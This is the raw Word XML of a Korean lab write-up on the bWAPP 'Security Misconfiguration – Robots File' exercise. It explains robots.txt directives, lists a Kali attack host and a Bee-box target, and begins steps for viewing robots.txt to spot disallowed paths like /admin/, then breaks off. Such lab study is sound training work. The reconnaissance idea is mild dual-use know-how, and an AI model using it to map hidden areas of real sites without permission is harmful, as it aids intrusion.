            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="58FA41A7" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
                </w:tcPr>
                <w:p w14:paraId="1FBCB137" w14:textId="5C70BCB9" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F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형식</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
                </w:tcPr>
                <w:p w14:paraId="24E75024" w14:textId="3049D608" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F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내용</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="68A5EA4C" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="13B595F0" w14:textId="1645A68C" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>User-agent: *</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="3845CBBD" w14:textId="10980445" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F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모든 검색 엔진</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="6721D1DB" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="401A613E" w14:textId="7AC4BA0C" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>User-agent: googlebot</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4F11561F" w14:textId="04F5A652" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F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구글 검색 엔진</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="5B930546" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="177C9C4C" w14:textId="554E5445" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>Allow: /</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2284CC01" w14:textId="52151FFE" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F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모든 디렉토리 접근 허용</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="4BB98A92" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="323E3023" w14:textId="0B53F685" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>Disallow: abc.ini</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="16C98329" w14:textId="09F6E398" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>‘abc.ini’</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F222F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파일 검색 차단</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="1C515A10" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2805D23D" w14:textId="5F1031D2" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>Disallow: /admin/</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="025F47C7" w14:textId="35444BB5" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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 xml:space="preserve">‘admin’ </w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F222F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디렉터리 접근 차단</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="007F222F" w:rsidRPr="007F222F" w14:paraId="55A608E3" w14:textId="77777777" w:rsidTr="00A068FB">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3149" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="77F8D733" w14:textId="37CD86E3" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F"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>Disallow:</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="4819" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2064C9FF" w14:textId="32B2C220" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
                  <w:pPr>
                    <w:jc w:val="center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7F222F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사이트 크롤링 가능</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3CEF14E6" w14:textId="77777777" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F">
            <w:pPr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  <w:p w14:paraId="39888B6B" w14:textId="04048857" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F">
            <w:pPr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</w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="70B576EE" w14:textId="77777777" w:rsidTr="007F222F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645A211E" w14:textId="43717AB0" w:rsidR="007F222F" w:rsidRPr="00A068FB" w:rsidRDefault="007F222F">
            <w:pPr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="00A068FB" w:rsidRPr="00A068FB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3. </w:t>
            </w:r>
            <w:r w:rsidR="00A068FB" w:rsidRPr="00A068FB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S</w:t>
            </w:r>
            <w:r w:rsidRPr="00A068FB">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ecurity Misconfiguration – Robots File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="315DA4E9" w14:textId="77777777" w:rsidTr="007F222F">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CE2CBF0" w14:textId="536C3E63" w:rsidR="007F222F" w:rsidRPr="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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A068FB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이 시나리오는 </w:t>
            </w:r>
            <w:r w:rsidR="007F222F" w:rsidRPr="00A068FB">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bWAPP</w:t>
            </w:r>
            <w:r w:rsidR="007F222F" w:rsidRPr="00A068FB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의 </w:t>
            </w:r>
            <w:r w:rsidR="007F222F" w:rsidRPr="00A068FB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‘robots.txt’ </w:t>
            </w:r>
            <w:r w:rsidR="007F222F" w:rsidRPr="00A068FB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파일 </w:t>
            </w:r>
            <w:r w:rsidR="00511F69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설정에 따른 페이지 접근 가능 여부를 확인해보는 내용이다.</w:t>
            </w:r>
            <w:r w:rsidR="00511F69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</w:p>
          <w:p w14:paraId="7CA06C0A" w14:textId="3F398652" w:rsidR="00A068FB" w:rsidRPr="007F222F" w:rsidRDefault="00A068FB" w:rsidP="00A068FB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3B43126" w14:textId="72CB2519" w:rsidR="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F"/>
    <w:p w14:paraId="765B2258" w14:textId="21418A53" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F"/>
    <w:p w14:paraId="6A644B78" w14:textId="24B03913" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F"/>
    <w:p w14:paraId="178A58C2" w14:textId="317BCF90" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F"/>
    <w:p w14:paraId="75D68CEB" w14:textId="42E909C2" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F"/>
    <w:p w14:paraId="01283105" w14:textId="7DED429D" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F"/>
    <w:p w14:paraId="12216AEA" w14:textId="270F44FD" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F"/>
    <w:p w14:paraId="0FD6574F" w14:textId="77777777" w:rsidR="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="007F222F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7F222F" w14:paraId="6E516476" w14:textId="77777777" w:rsidTr="007F222F">
        <w:trPr>
          <w:trHeight w:val="80"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72CE459C" w14:textId="50325219" w:rsidR="007F222F" w:rsidRDefault="007F222F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66A747B7" wp14:editId="47E5A687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79" name="직사각형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5A12B" id="직사각형 79" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt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NsmK1r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7F222F" w14:paraId="4FBD4B65" w14:textId="77777777" w:rsidTr="007F222F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left w:val="nil"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4387E732" w14:textId="55D87C47" w:rsidR="007F222F" w:rsidRDefault="007F222F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hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:br w:type="page"/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 (필요시 가정이나 예상 시나리오 포함)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="6D733969" w14:textId="77777777" w:rsidTr="007F222F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  <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C02408D" w14:textId="638422E4" w:rsidR="007F222F" w:rsidRDefault="007F222F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3A771478" wp14:editId="1440C1FD">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-43180</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="margin">
                        <wp:posOffset>-683895</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="9904095"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
                      <wp:wrapNone/>
                      <wp:docPr id="74" name="직사각형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904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1B46E" id="직사각형 74" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-3.4pt;margin-top:-53.85pt;width:533.25pt;height:779.85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7F222F" w14:paraId="3ECBA2D8" w14:textId="77777777" w:rsidTr="007F222F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786E6954" w14:textId="5D2A74E7" w:rsidR="007F222F" w:rsidRDefault="00382A60">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="36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1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. </w:t>
            </w:r>
            <w:r w:rsidRPr="0014000D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>실습환경</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="5AE4999D" w14:textId="77777777" w:rsidTr="007F222F">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="272A9609" w14:textId="77777777" w:rsidR="007F222F" w:rsidRDefault="007F222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483"/>
              <w:gridCol w:w="3483"/>
              <w:gridCol w:w="3484"/>
            </w:tblGrid>
            <w:tr w:rsidR="00382A60" w14:paraId="42E096F6" w14:textId="77777777" w:rsidTr="00A849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5" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="225480F5" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A60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</w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="1EE40010" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A6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OS</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3485" w:type="dxa"/>
                  <w:tcBorders>
                    <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
                  </w:tcBorders>
                  <w:vAlign w:val="center"/>
                </w:tcPr>
                <w:p w14:paraId="2BE31D1C" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A6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IP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00382A60" w14:paraId="2BD80ABE" w14:textId="77777777" w:rsidTr="00A849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C2266" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A60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공격 호스트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08464" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A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Kali Linux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3A1EE" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A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192.168.0.1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49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/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00382A60" w14:paraId="1F7D5A35" w14:textId="77777777" w:rsidTr="00A849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0E85A" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A60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타겟 호스트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E898D" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A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Ubuntu(Bee-box)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FE3A7" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A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192.168.0.146/24</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="225E9A5C" w14:textId="77777777" w:rsidR="00382A60" w:rsidRDefault="00382A6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AC60CC4" w14:textId="27CA990F" w:rsidR="00382A60" w:rsidRPr="00382A60" w:rsidRDefault="00382A60">
            <w:pPr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</w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="2652ECD8" w14:textId="77777777" w:rsidTr="007F222F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0EE5F0C8" w14:textId="37806702" w:rsidR="007F222F" w:rsidRPr="00382A60" w:rsidRDefault="00382A60">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="_Hlk61398873"/>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">obots </w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ile </w:t>
            </w:r>
            <w:r w:rsidRPr="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>공격과정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="1D7E7899" w14:textId="7C7F22DE" w:rsidR="00382A60" w:rsidRPr="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A60">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E53D42" w14:textId="7D78B77C" w:rsidR="00382A60" w:rsidRPr="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A60">
      <w:pPr>
        <w:ind w:left="1120"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">obots File </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C2F5F" w14:textId="7D823782" w:rsidR="00382A60" w:rsidRPr="00382A60" w:rsidRDefault="00382A60" w:rsidP="00382A60">
      <w:pPr>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">low </w:t>
      </w:r>
      <w:r w:rsidRPr="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, set 클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B8FF1" w14:textId="34CD24C3" w:rsidR="00A068FB" w:rsidRDefault="00B779A6" w:rsidP="00382A60">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="1000"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr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E777DB" wp14:editId="1F5D4123">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4233742</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1061010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1625333" cy="357468"/>
                <wp:effectExtent l="19050" t="19050" r="13335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333" cy="3574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C4971" id="직사각형 100" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:333.35pt;margin-top:83.55pt;width:128pt;height:28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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr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5C6E57" wp14:editId="731CED99">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4233742</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>807436</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1617650" cy="188419"/>
                <wp:effectExtent l="19050" t="19050" r="20955" b="2159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650" cy="1884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49A98" id="직사각형 99" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:333.35pt;margin-top:63.6pt;width:127.35pt;height:14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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr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B649A7" wp14:editId="111C78E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1682643</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>354078</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1878907" cy="203787"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="2540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07" cy="2037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1BCAA" id="직사각형 98" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:132.5pt;margin-top:27.9pt;width:147.95pt;height:16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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A068FB" w:rsidRPr="00A068FB">
        <w:rPr>
          <w:noProof/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21FAB2E4" wp14:editId="429B7465">
            <wp:extent cx="5760000" cy="1596621"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2286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96621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2CA9A5" w14:textId="77777777" w:rsidR="00FA6099" w:rsidRDefault="00FA6099" w:rsidP="00382A60">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="1000"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50654672" w14:textId="77845184" w:rsidR="00382A60" w:rsidRDefault="009321EF" w:rsidP="00A8495D">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WAPP </w:t>
      </w:r>
      <w:r w:rsidR="00A8495D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00382A60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidR="00A8495D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00382A60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00382A60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>파일 내용</w:t>
      </w:r>
      <w:r w:rsidR="00A8495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 출력</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17108242" w14:textId="59021437" w:rsidR="00382A60" w:rsidRDefault="009321EF" w:rsidP="00382A60">
      <w:pPr>
        <w:ind w:firstLineChars="500" w:firstLine="1000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AC673FC" wp14:editId="535EE2C1">
            <wp:extent cx="3215928" cy="2447290"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="1016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52" cy="2457201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FCE6629" w14:textId="41028C66" w:rsidR="009321EF" w:rsidRDefault="009321EF" w:rsidP="00FA6099">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009321EF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
